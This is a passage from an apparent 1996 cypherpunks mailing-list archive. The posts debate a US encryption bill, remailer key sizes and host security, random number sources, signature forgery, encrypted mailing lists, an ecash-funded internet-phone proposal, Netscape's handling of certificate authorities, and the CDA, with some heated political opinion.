While I agree this segment of the bill may be an excellent result, there is 
no reason that we should have to tolerate the bad portions of this bill to 
get the good portions.

>(The bill does a few other things.
>One, it provides for criminal penalties for key holders who abuse
>their role as an escrow agent, assuming anyone *chose* to use key
>escrow.

Which may, inadvertently, give the average individual the ILLUSION of 
protection.  Remember, prosecutions occur because the GOVERNMENT wants them 
to occur; there is no such thing as a "private prosecution," unfortunately.  
I'm not particularly afraid of abuse by key escrow agents, because I have no 
intent of using one.  

>Second, it makes the use of encryption -any encryption- a
>crime if used in the commission of or support of any criminal
>activity. 

Having not read the bill, I can't know for sure, but I'd imagine that if the 
term "support" is in the bill, they define that term as broadly as they want 
to.  Sorry, but I'm not satisfied.  If an act is criminal, let's prosecute 
the act itself.  Any attempt to prosecute USE of encryption must, 
essentially by definition, impute an INTENT to the user, an intent that the 
government will fabricate after-the-fact.

The government will also use this law to keep themselves in business, as you 
probably understand I believe.

>I think the bill would be better off without these
>provisions, but I suspect this is an attempt to give the
>administration something.)

Let's give them NOTHING.  The government is already hamstrung in their
attempt to restrict encryption.  I expect that nothing in this bill helps us
out in any way.

>I anticipate that the Administration, led by the intelligence and law
>enforcement interests, will vigorously lobby against this bill...

As surprising as this may sound, I hope THEY "win."  Because that won't 
really be a win for them, and it won't really be a 
loss for "us."  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Thu, 7 Mar 1996 16:06:57 +0800
To: cypherpunks@toad.com
Subject: Re: (Fwd) Gov't run anon servers
Message-ID: <v02140b00ad623c93a62d@[199.2.22.124]>
MIME-Version: 1.0
Content-Type: text/plain



Hal Finney writes:

>From: mccoy@communities.com (Jim McCoy)
[...]
>> The point is not to make a system which is absolutely, positively, no
>> doubt about it, secure against any attacker.  If cypherpunks could do
>> this they would be working for defense contractors and others who make
>> certified systems.  The objective is to make a system which is difficult
>> to attack, one which costs the attacker time/money.
[...]
>
>I was speaking of present conditions.  If and when proven-secure Unix
>systems start being used as remailer servers on the net then it may be
>worthwhile having a larger key.

You are correct in stating that having a huge key on a remailer is
as silly as putting a $500 lock on a door made of balsa wood.  OTOH,
the key selected is vulnerable from attacks which you cannot protect
yourself against.  No amount of detailed security analysis for a host
is going to prevent someone else from factoring the keys, and there is
nothing that can be done to prevent this from happening.  To prevent
this is seesm reasonable to select a key which is at least somewhat
outside the range of most attackers, 510 bits seems to be pushing the
lower bounds of this range a bit (while more than 1024 is probably
useless overkill.)  With fairly decent logging and auditing at least
you know that you have been screwed when it comes to standard system
break-ins, you do not know that you have a problem when your key is
factored.

[...]
>> The unix hosts running remailers also have the advantage in
>> that they have been subjected to attack for quite a while now and
>> most of the obvious problems (and some of the non-obvious problems)
>> have been fixed.
>
>I am not sure what you mean by this.  My experience is that new CERT
>advisories come out every few months which represent security holes big
>enough to steal remailer keys.

Well, most of the announcements in the past year have been attacks
through subsystems which a remailer should not be running in the
first place (e.g. the recent chargen/daytime/etc attacks.)  The fact
that the announcements come out in the first place is a "good thing"
because it makes you aware of the problem.  The timid will then think
that the system which is the subject of the announcement is insecure
and place their trust in a system which is not under the same sort of
public scrutiny (e.g. Windows NT, or a VM/CMS system) but which is
even easier to hack.  At least people are aware of security issues on
Unix hosts... (a quick walk through a Computer Literacy bookstore
last night turned up twelve books on Unix/internet-server security
and none dealing specifically with Windoze95 or NT security, does
that mean that my NT test box is perfectly secure? :)

Otherwise, I agree that assuming you have a secure remailer just
because you use a big key is a foolish attitude.

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Sat, 9 Mar 1996 12:47:05 +0800
To: cypherpunks@toad.com
Subject: Reasons for codes
Message-ID: <960305201404.20203d67@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


>Totally untrue. The use of encryption for business purposes goes back
>centuries, 

In fact there are lots of reasons for codes. One not mentioned that has a 
long and glorious history involve CHARLESTON, TABLEDRUGS, or BLACKHORSE
and can be seen in commercial use today.
						Warmly,
							Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: clarissa_wong@alpha.c2.org (Clarissa Wong)
Date: Fri, 8 Mar 1996 08:28:22 +0800
To: cypherpunks@toad.com
Subject: Jump Start ecash With IPhone
Message-ID: <199603060435.UAA07171@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Proposal: Augment computer-to-computer Internet phone with local
          telephone-to-Internet-phone gateways to create a new
	  telephone-to-telephone long distance network via the Internet.

Result 1: No computer is needed for cheap long distance or
          international voice phone calls.
Result 2: ecash gets its "Killer Ap", a service that (a) people
          want to buy and (b) requires micropayments for economic
	  feasibility.  (Details below.)
Result 3: Creates a large, decentralized market that is difficult
	  for anyone to regulate and that provides many opportunities
	  to make money.
Obvious
Nonresult: Achieving privacy in long distance or international voice
          requires further development.  Hardware and software
	  beyond that in an ordinary telephone is needed at each end.

Who Can Do It:

    ISPs (Internet Service Providers) are in the best position to
    operate nodes of this decentralized network.  They have the
    Internet connection, the phone banks, the technical expertise,
    and some business experience.

      Telephone <---> ISP <---------> ISP <---> Telephone

Scenario (Result 1):

    Granny Smith in Paducah wants to chat with her grandson Adam Smith,
    who is studying economics in Hong Kong.  From her ordinary touch-tone
    phone she makes a local _voice_ call to Cheap Speech, Inc. and at
    the prompt enters the phone number for Adam.  Cheap Speech finds that
    TalkToMe Ltd is a network node in Hong Kong within a local phone call
    of Adam and, through the Internet, establishes a connection.  Then it
    patches in the voice call from Granny as TalkToMe dials out and
    reaches Adam.

      Granny Smith <--> Cheap Speech <-----> TalkToMe <--> Adam Smith

Payments (Result 2):

    More than half the cost of running a traditional long distance voice
    business is for handling the billing.  The cost of the technology to
    provide the service is thus less than the cost of the billing!
    Cheap Speech and TalkToMe cannot provide cheap voice service,
    as in the example above, unless they use a much more efficient payment
    system.  That is why the low transaction cost of ecash is so important
    and that is why this message is being sent to cypherpunks rather than a
    telecom list or news group.

    So who uses the ecash?  Surely Granny and Adam Smith can't shove it
    through ordinary telephones.  They just want to get ordinary voice
    connections with ordinary telephones as they have for many years,
    only cheaper.

    Here is how I think ecash fits in:

      Granny Smith --> Cheap Speech
          Granny pays Cheap Speech through ordinary means, probably
          by monthly credit card charge, which is common for ISPs.
	  The overhead for this probably is only around 5% (plus staff
	  for account setup and support) because the ISP already is
	  set up for that kind of payment system and Granny Smith is
	  a local person providing repeat business, not a bad apple
	  on a spending spree with a stolen credit card number.

      Cheap Speech --> TalkToMe
          Cheap Speech and TalkToMe do not have any previous business
	  arrangement with each other and probably never have done business
	  with each other before.  They also are on opposite sides of the
	  world.  But Cheap Speech consults a Rating Service that says
	  TalkToMe is reliable, so Cheap Speech sends a small amount of
	  ecash to TalkToMe to open a connection and dial out to Adam.
	  Since ecash clears instantly, TalkToMe does not need to know
	  anything about Cheap Speech.  No international billing network
	  is needed.  Little overhead is incurred.

      TalkToMe --> Adam Smith
          TalkToMe provides this service in exchange for the ecash from
	  Cheap Speech.

    The main problem I see with this scheme is that Cheap Speech may
    have a cash flow problem.  Payment to TalkToMe must be made immediately
    whereas payment from Granny Smith may take a couple of months to
    arrive.  If, however, the volume of incoming calls (ecash coming in)
    matches the volume of outgoing calls (ecash going out), then the cash
    flow will balance out.  Also, Cheap Speech could offer Granny a discount
    for prepayment.

Regulation and Profit Opportunities (Result 3):

    Big, centralized organizations are big targets for lawsuits and
    regulation.  They are the "deep pockets" lawyers love to pick.
    They are the leverage points for power-hungry politicians.

    But the Internet was designed to survive nuclear war.  It was
    designed to route around outages, no matter their cause.
    A decentralized, Internet-based, international network of small,
    independent voice service providers could enjoy similar advantages.

    Many companies are creating _computer-to-computer_ Internet phone
    software.  See the NetWatch Top Ten - Voice / Video On The Net at URL:
            http://www.pulver.com/netwatch/topten/tt24.htm
    We can depend on that technology to improve.  I do not know of any
    companies who also are providing interfaces to ordinary telephones
    and designing a decentralized network with an ecash-powered payment
    system.  That is our advantage.

    But the network described above has many limitations.  These are
    opportunities to make money by selling your solutions to customers.
    Examples:

    It needs a directory and rating service for voice providers such as
        Cheap Speech and TalkToMe.  (Perhaps Raph Levien will expand
	his rating services to a new domain?)
    The network will not be useful until it has many nodes.
        That is partly why this proposal is being sent to a large audience.
	Cypherpunks who cut their teeth building a remailer network perhaps
	can build a voice network, too?  Think of it as a challenge.
    People who travel a lot will want cheap long distance telephone service
        while on the road.  How do they arrange that if their only contract
	is with a service provider near their home?  We need a more
	flexible payment protocol than the one described above.
    Enhanced services - fax, teleconferencing, time-delay and retry,
        phone mail, and collect calls.
    Multiple brands of ecash will require conversion services.  Currently
        Mark Twain Bank's offering looks best, but when ecash succeeds,
	expect many more.  Eventually, the network may work best with
	ecash denominated in currencies other than government-sponsored
	fiat currencies.

Conclusion:

If this idea is so good, then why am I telling you about it?

  (A) I cannot do it all myself.
  (B) Feedback on the idea from knowledgeable people is valuable.
  (C) If it succeeds, it will create a market with opportunity for
      plenty of people to make money, including me.
  (D) We have a limited window of opportunity to get this done.  My guess
      is that we have roughly one year before other people embed their
      solutions into the Internet and financial system so deeply that
      this network will be locked out from commercial success.  According
      to the theory of increasing returns, whoever gets to market first
      usually gets the market.
  (E) Even though the decentralized structure should help reduce exposure
      of the network-as-a-whole to harmful lawsuits and regulations,
      individual local providers may face sanctions from regulators of
      the FCC, state PUCs, national Telekom monopolies, etc. once they
      realize what's happening.  (Operators of cypherpunk remailers endure
      similar risks.)  The faster the system can be developed and deployed,
      with a large number of satisfied customers, the more widespread
      support it will have, the harder it will be to stamp out, and the
      safer life will be for everyone involved.  It would be nice to be
      able to say "The Genie is out of the bottle."

   CW




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Thu, 7 Mar 1996 16:04:15 +0800
To: cypherpunks@toad.com
Subject: Re: Truelly Random Numbers
Message-ID: <199603060212.VAA09237@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Tim Fulbright wrote:
> 
> Now I, a lurker for two months, am truelly confused!  L. Deitweiler must be
> right.   Surely one of you cyperpunk fellows could hack together a dongle with
> some kind of AD converter and buffer ram to gather a Truelly Random Bitstream
> off the environment every couple of milliseconds easier than this raindrop
> scheme or recording the fan, you're haviung me on!.  Let's go back [..]

The raindrop scheme was (politely) laughed off.  As for the fan recording
scheme, it's a good make-do-with-what-you-already-have method, as opposed
to buying and/or building a card.

A 'simple AD converter' isn't so simple.  Especially if you want to be
sure you really have random noise and not something else that just looks
random.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMTz0nSoZzwIn1bdtAQGl6QF+P1V62qg+Mf5K+VN3q0Y1e6/A4EO4uLLr
WNxAbtE+OxQXFKnP7ajFUFBbnDLJxLmx
=4ysY
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Thu, 7 Mar 1996 16:06:43 +0800
To: "Charles Choi (SAR)" <choi@virtu.sar.usf.edu>
Subject: Re: Signature 2
In-Reply-To: <Pine.SUN.3.91.960305202130.11469B-100000@virtu>
Message-ID: <199603060218.VAA08242@in-touch.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

> Assumption 1 : a privacy key can become uncrackable.
> Assumption 2 : an individual signature can become immune to fraud.
> Posit : fuse the two together so that pseudonyms/aliases/online names ensure 
> 		complete privacy, but ensure that you talk to the same person
> 		everytime.  
> Probably proposed already.

Unforutnately both of your assumptions are wrong.  A key cannot be
100% uncrackable, and a signature cannot be 100% immune to fraud.
With electronic security, there is always a chance that a key can be
cracked or a signature forged.  The question is how hard is it to
crack the key or forge the signature?  You need to balance the
security with the price.

For example, a 1024-bit RSA key cannot be cracked, today, in a
reasonable amount of time.  However it is unclear how long that will
last.  Look at RSA-129; in 1977 Ron Rivest said it would take 40
quadrillion years to break the key.  In 1993-4 it took 8 months (5000
MIPS-years).

A key has a limited size, therefore it is theoretically possible to
try every single key (this is called brute-force).  Therefore it is
impossible to have 100% uncrackable keys.  Singatures have the same
problem.

Enjoy!

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 7 Mar 1996 22:26:22 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Bombings, Surveillance, and Free Societies
Message-ID: <199603060542.VAA28879@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:41 PM 3/4/96 -0800, Tim wrote:

>Let me use the language Bill Stewart used a while back, language which
>skirts the issue of "right" and "wrong" even more neatly than I did (when I
>said the Jews were "asking for trouble"):
>
>"If a religious group uses force to expel the current occupants of a desert
>region, and expels them to just beyond their borders, it is "unsurprising"
>that those expelled, and their children, and their children's children,
>will swear a blood oath to drive the group into the sea."

That wasn't me, though I've said similar things about terrorism against
governments - those that go out of their way to attack and harass people
shouldn't be surprised when people attack them in return.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 7 Mar 1996 22:33:14 +0800
To: cypherpunks@toad.com
Subject: Re: Looking for code to run an encrypted mailing list
Message-ID: <199603060542.VAA28896@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>John Pettitt <jpp@software.net> wrote:
>> Poster cryptes mail with pgp using list exploder key. List exploder decrypts
>> mail and recrypts with keys for all current list members and then sends the
>> mail.

At 09:24 PM 3/4/96 -0800, abostick@netcom.com (Alan Bostick) 
suggested having the mailing list handler decrypt the session key
using its private key, and re-encrypt with the public keys of the
list members, but not do the IDEA decryption and re-encryption N times
of the message body.  This has the further advantage that the cleartext message
body is never sitting around on the server where it might end up in swap space
or file system leftover blocks.

On the other hand, it really only costs you one IDEA encryption if you
want to use the multiple-recipients options to PGP.  With the current PGP,
this means you don't have to hack your own crypto code; the toolkits in PGP 3.0
will make that easier, though.

>> [I don't want all the list members to need to know every other list members
>> public key]

The multiple-recipients PGP doesn't give away everyone's public keys,
only their keyIDs.  If you want to remain pseudonymous, just create a
public key that you use only for subscribing to the list.  

(Hmmm - multiple recipient support probably makes stealth-PGP harder to
implement...)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Thu, 7 Mar 1996 16:03:59 +0800
To: cypherpunks@toad.com
Subject: Bootable disks
Message-ID: <960305215227.20204ca4@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


> New hardware drives with replaceable media in the 100+ Mb
>range has developed. The Syquest 135 Mb drive, featured in the latest issue
>of _PC Mag_ can, with the parallel port version, reportedly boot. 
 
>This means one can have the drive that weighs about two pounds and a $20
>disk, place another OS on the disk, and have a very portable remailer
>system. 

Have made some small study of that area and would be somewhat surprised if
possible as advertised (BIOS would need some reason to look for disk on
parallel port).

What *might* be possible is to create a floppy that would install a device
driver that would install directly on top of the BIOS intercepts that
would transfer the boot to the Syquest but this would only work for 
an OS that did not replace the BIOS access with "something else" unless
you had a driver for *that*.

If you *really* wanted to go overboard, it would also be possible to create
a PROM that could be plugged into the "bootp" socket of a NIC and do the
same thing but the floppy route would be lots easier. A prom is how Iomega
used to be able to make Bernoullis the boot disk - went into a socket on
the PC2B (and earlier combo) card.

Incidently more than one "hard disk encryption system" using this method has 
been broken once I have grabbed the intercept out of a booted system. Is
also effective for recovering from CPTs.

					Warmly,
						Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Sat, 9 Mar 1996 21:42:23 +0800
To: cypherpunks@toad.com
Subject: Re: Signature 2
Message-ID: <v02140b00ad6277991102@[199.2.22.124]>
MIME-Version: 1.0
Content-Type: text/plain


>Hi,
>
>> Assumption 1 : a privacy key can become uncrackable.
>> Assumption 2 : an individual signature can become immune to fraud.
>> Posit : fuse the two together so that pseudonyms/aliases/online names ensure
>>               complete privacy, but ensure that you talk to the same person
>>               everytime.
>> Probably proposed already.
>
>Unforutnately both of your assumptions are wrong.  A key cannot be
>100% uncrackable, and a signature cannot be 100% immune to fraud.
>With electronic security, there is always a chance that a key can be
>cracked or a signature forged.  The question is how hard is it to
>crack the key or forge the signature?  You need to balance the
>security with the price.

Derek is correct in that your use of the words "uncrackable" and
"immune to fraud" were a bit over the top (in recent years everyone
in the security and crypto community has become very nervous whenever
anyone says things like this; they are usually trying to sell you
something which is neither.)  OTOH, he might want to temper his
statement with a reference to fail-stop signatures...  Just because
someone with a lot of computational resources can produce a private
key which matches your public key does not necessarily mean that
they are the same ones that you generated, only that they found a
set which work for the particular modulus which was chosen...

In the "real world" there is nothing to prevent someone from forging
your real signature on a check or document or from disguising themselves
as you and taking your place at an important business meeting.  The
digital equivalents can be slightly more secure, but nothing is ever
perfect.

jim







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eggplant@inlink.com (eggplant)
Date: Thu, 7 Mar 1996 22:35:04 +0800
To: cypherpunks@toad.com
Subject: Hmmm
Message-ID: <v01510107ad62d4e24565@[206.196.98.94]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>(Lots of stuff deleted)
>
>>I attended last weeks "Information, National Policies, and International
>>Infrastructure" Symposium at Harvard Law School, organized by the Global
>>Information Infrastructure Commission, the Kennedy School and the
>>Institute for Information Technology Law & Policy of Harvard Law School.
>
>>During the presentation by Paul Strassmann, National Defense University
>>and William Marlow, Science Applications International Corporation,
>>entitled "Anonymous Remailers as Risk-Free International Infoterrorists"
>>the questions was raised from audience (Professor Chaarles Nesson,
>>Harvard LAw School) - in a rather extended debate - whether the CIA and
>>similar government agencies are involved in running anonymous remailers
>>as this would be a perfect target to scan possibly illegal messages.
>
>>Both presenters explicitly acknowledged that a number of anonymous
>>remnailers in the US are run by government agencies scanning traffic.
>>Marlow said that the government runs at least a dozen remailers and that
>>the most popular remailers in France and Germany are run by the
>>respective government agencies in these countries. In addition they
>>mentioned that the NSA has successfully developed systems to break
>>encrypted messages below 1000 bit of key length and strongly suggested
>>to use at least 1024 bit keys. They said that they semselves use 1024
>>bit keys.
>
>>I ask Marlos afterwards if these comments were off or on record, he
>>paused then said that he can be quoted.
>
>>So I thought I pass that on. It seems interesting enough, don't you
>>think?
>
>(more stuff deleted)
>
>     I don't know about everyone else, but I consider this, if true, to be a
>MAJOR worry.  It never ceases to amaze me how lightly the government takes
>lying to the people.  Unfortunately I don't have the contacts or resources
>to do any further investigation, I hope this thread is resolved one way or
>another soon.
>
>nobody@unimportant


Ther is always the posibility of disinformation. That is one of the
governments specialties. I'm not saying the posibility isn't there, I'm
sure there are anon remailers run by the government. An I remember from a
show on PBS I watched months ago in which someone from inside the CIA said
that the government does actively monitor the Internet and has for a long
time.

The thing to remember is to PGP your important mail and sign everything....


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMTvIw4WnykIBM1nhAQEnpAgAjVDhjgKrLQWxzRIL6nc8WQLCOLxTkGI7
ybr6cse/ARbdhNv+FD+XHEEtXngxA+p45jJHUE4OHyIKUTy6AVa3wi1U5DlBmTB8
XbFHF4YwTwpMhBpBnGl5iBMwO3ZYrtQ/3SE4mIi99DhVzpQHywlJeo0DbHAdrPJU
UunZF0nhZyz0ycCQWMJ8yZL6iVkuZXnCkZfMjNtMIttEgh+I/R3hRiGNisZPJQvX
krbrJsRZhpYv7Fk72zXD9YxqizczJuom63jPQNqkUK/XqfuulQD4b632BS1gmhNc
jHwLw9tUkV5bne2digLe5FDL2Jxhi7TsZ56MzAgB8D8SDBf/I6Dphw==
=XBqQ
-----END PGP SIGNATURE-----

--
"... In Germany they first came for the Communists and I
didn't speak up because I wasn't a Communist. Then they came
for the Jews, and I didn't speak up because I wasn't a Jew.
Then they came for the trade unionists, and I didn't speak
up because I wasn't a trade unionist.  Then they came for
up because I wasn't a trade unionist.  Then they came for
Catholics, and I didn't speak up because I was a Protestant.
Then they came for me-and by that time no one was left to
speak up..." Pastor Martin Niemoller

++++++++++++
**************************************
*	 Matthew Murphy	------------ eggplant@inlink.com
*   ----------
*   http://www.inlink.com/~eggplant
*   The Web page is under construciton at this time though..
*   Please don't mind the mess....	
*									   		   																													     	
**************************************
++++++++++++
finger eggplant@inlink.com for my PGP key.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 7 Mar 1996 22:39:34 +0800
To: cypherpunks@toad.com
Subject: Another Motivation for the CDA
Message-ID: <ad62728b1a0210049ce9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Given that Sen. Fineswine is one of the strongest supporters of gun
confiscation, and that she had this to say about the Telecom Bill:

"Sen. Feinstein (D-CA)
Mrs. Feinstein: Mr. President, I rise in support of the conference
report for the Telecommunications Act of 1995. This legislation
establishes real progress on important issues and I am pleased to
provide my support.

Senator Exon's provisions to control access to indecent materials will
require the operators of computer networks, like America Online, to
screen out indecent materials for children."

I think we need to look at another motive, or at least another effect, of
the CDA's felonization of "indecent" speech (uttering the words "fuck" or
"shit," or doing a large number of other such things, where any minor could
possibly see these words, is a felony. Not a misdemeanor, a _felony_.

No felon may own a gun legally in California, for some period of time after
conviction. I presume similar laws apply in other states. (Of course, a lot
of real criminals own all sorts of guns, but at least the "indecent
speakers" will have their existing guns removed from them and will be
unable to buy new ones for some number of years after their convictions.)

Therefore, one think to think about is that a felony conviction for
violation of the CDA will result in one being disarmed (of the ones they
know about). Duncan Frissell frequently regales us with tales of how he has
made himself "judgment-proof." More power to him, but it doesn't make me
feel any better.

Fineswine, Schroeder, and similar such vermin have probably figured out
that by felonizing dirty words they have another tool to use in the
disarming of America. When nearly everyone is a criminal, in the eyes of
the law, then the populace is well and truly under their thumbs.

The good news is that I can probably get off of jury duty pretty simply by
saying "But I'm a felon." (Even if they ask for details, about my
conviction, merely by explaining why I answered this way I'll doubtless be
excused.) Of course, I haven't been called for jury duty and actually had
to report for selection since 1973, so I must be in their file of
Undesirables already.

--Tim May, a fucking felon

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 8 Mar 1996 08:25:30 +0800
To: ChristopherA@consensus.com (Christopher Allen)
Subject: Re: SEAL cipher info requested (something actually list related!)
In-Reply-To: <v03005302ad621f89a608@[157.22.240.192]>
Message-ID: <199603060521.AAA15746@homeport.org>
MIME-Version: 1.0
Content-Type: text


Christopher Allen wrote:

|   * are there are any links on the web to SEAL?

Ask Altavista.

|   * is IBM actively marketing it?

See above.  If you can't find it on the web, they're not actively
marketing it. :)

|   * what precisely is patent?
|   * for how long?
|   * has anyone currently licensed it?
|   * has anyone tried attacking the algorithm?
|   * should we be (the community) be looking at SEAL
|     for standards (say as an alternative to RC4?)?
|   * is there something better then SEAL available?

	How about Blowfish?

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eggplant@inlink.com (eggplant)
Date: Sat, 9 Mar 1996 21:48:59 +0800
To: clarissa_wong@alpha.c2.org (Clarissa Wong)
Subject: Re: Jump Start ecash With IPhone
Message-ID: <v01510102ad62ee3d2384@[206.196.98.101]>
MIME-Version: 1.0
Content-Type: text/plain


How about...only paying for the initial investment of the phone program and
hardware. No more costs to pay, get rid of long distance charges
all-togther. Except for the ISP charge of course. And how about the ISP's
setting up a special account for people only needing the Iphone. That way
all the revnue that generates (well most of it) can go to increasing the
bandwith. Increased bandwith (fibre?) is the key factor here, both your
scenario and mine. Also, what companies want to invest in a dedicated
internet phone?
How about a combination...all-in-one web browsing (that's what many people
will wnt in the future for sure), internet phone and CD-ROM playing system.
That way people who don't want a full-scale computer can get something
cheaper than a computer that will do all they need it to do. Of course the
system should allow for email (including PGP, etc) and some text editing.

Just a thought....

--
"... In Germany they first came for the Communists and I
didn't speak up because I wasn't a Communist. Then they came
for the Jews, and I didn't speak up because I wasn't a Jew.
Then they came for the trade unionists, and I didn't speak
up because I wasn't a trade unionist.  Then they came for
Catholics, and I didn't speak up because I was a Protestant.
Then they came for me-and by that time no one was left to
speak up..." Pastor Martin Niemoller

++++++++++++
**************************************
*	 Matthew Murphy	------------ eggplant@inlink.com
*   ----------
*   http://www.inlink.com/~eggplant
*   The Web page is under construciton at this time though..
*   Please don't mind the mess....	
*									   		   																													     	
**************************************
++++++++++++
finger eggplant@inlink.com for my PGP key.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 9 Mar 1996 21:49:06 +0800
To: Alex Strasheim <alex@proust.suba.com>
Subject: Re: new netscape servers
In-Reply-To: <199603052036.OAA04200@proust.suba.com>
Message-ID: <313D5C6A.6A4A@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Alex Strasheim wrote:
> 
> From the Netscape home page:
> 
> "Netscape also announced FastTrack Server 2.0, an entry-level Web server
> that combines all the new capabilities of the next-generation Netscape
> Servers into one easy-to-use package.  FastTrack comes with SSL security,
> Java and JavaScript support, and Netscape Navigator Gold content-creation
> software - for only $295."
> 
> There are two reactions we can have to this.  On the one hand, it's a
> good thing because it's going to make SSL servers a lot more popular.
> 
> But at the same time, it raises some serious questoins about how Netscape
> plans on dealing with competitors.  It's not clear whether or not the
> $295 price tag includes a certificate or not.  But is it coincidental
> that people who want to use alternative technology like apacheSSL will
> have to pay the same price for the cert along as Netscape's customers
> will have to pay for a plug and play package?

  As far as I know we are not bundling a certificate.  It doesn't say so
in the press release either, so I wonder what made you think that we were?

> (The rest of this post is based on the assumption that you do get a cert
> with the "fast-track" server.  That's not clear, so if I'm wrong, I
> apologize to the folks at Netscape.)
> 
> There are two things keeping an organization like c2.org from competitng
> with Netcape on price:  verisign and the licensing fees on rsaref.  Both
> companies have close ties to Netscape.

  What do you mean by "close ties to Netscape"?  You are making this sound
like some sort of conspiracy.  We are customers of RSA and Verisign, just
like c2.org or microsoft.com.

> It's imperative that we challenge Netscape's control over the CAs.
> Obviously they can preinstall whatever CAs they want in their browsers.
> 
> But that doesn't mean we're powerless.  I think we ought to:
> 
> (1) form a new non-profit low cost CA

  I encourage you and anyone else who is interested to do this if you want
to.  However I do suggest that you consult a lawyer, since there may be
liability issues involved.  There are a lot of big and medium sized companies
that are entering or about to enter this market.  I'm sure there is room for
some lean low cost ones too.

> (2) make a concerted effort to explain the issue to the public and
> encourage people to ok the new CA.

  Again I encourage you to help in educating the public about the issues
involved.

> (3) try to create a sense that using a preinstalled CA is a form a
> collaboration (this will be hard, but I think it's true).  If enough
> people will use a new CA, then it will be as good as one of the
> pre-installed ones.
> 
> We can't let this sort of power concentrate in Netscape's hands.  It's
> not a question of whether or not they're good people.  It's just a bad
> development for everyone.

  You seem to be under the incorrect impression that Netscape is in some
conspiracy with verisign to control the market for certificates.  Nothing
is further from the truth.  We are taking steps to increase competition in
the market and give users the ultimate choice about who they want to trust.
The ability to add and delete trusted CAs in the 2.0 Navigator is just the
first step.

  We are also working on a written criteria for including CA certs in the
"Netscape provided" set.  I've been involved in writing the criteria, and
have tried to push it in a direction that will allow little guys to
compete on even ground with the big guys.  I don't know when it will be
available since the whole process involves lawyers and issues of liability,
so we just have to wait until they bless it.  As soon as we can make it
available we will.

  I recently created a document that describes how our current products
deal with certificates.  This should be enough on the technical side to
allow anyone to create a CA.  That document can be found at:

	http://home.netscape.com/newsref/std/ssl_2.0_certificate.html

  I hope I have addressed your concerns.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Davis <eagle@armory.com>
Date: Sat, 9 Mar 1996 04:27:53 +0800
To: cypher punks <cypherpunks@toad.com>
Subject: Re: EFF Statement on Leahy/Burns/Murray Crypto Bill
In-Reply-To: <313CF3AD.1BC3@best.com>
Message-ID: <9603060157.aa06384@deepthought.armory.com>
MIME-Version: 1.0
Content-Type: text


<sophi@best.com> (Greg Kucharo) sez...

> I'm a little confused by this phrase from the bill. It seems to be
> saying just that export needs to be authorized if the software is 
> already exportable from the U.S. and if to a financial institution.
>  I know that can't be right, but what is the translation of this 
> legalese?
> 
> > "Requires that export be authorized for non-military encryption
> >  software to any country where similar software is exportable from
> >  the U.S. to foreign financial institutions."

That's so the Federal Reserve doesn't become crippled in the world monetary
market, just because the NSA doesn't want to lose its wire-tap ability. 
-- 
According to John Perry Barlow:                       *What is EFF?* 
"Jeff Davis is a truly gifted trouble-maker." *email <info@eff.org>*
*** O U T L A W S  On The  E L E C T R O N I C  F R O N T I E R ****
US Out Of Cyberspace!!! Join EFF Today! *email <membership@eff.org>*   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
